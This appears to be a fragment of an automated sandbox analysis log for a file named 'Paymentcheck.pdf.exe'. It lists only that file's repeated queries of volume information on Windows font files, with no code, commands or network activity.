Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
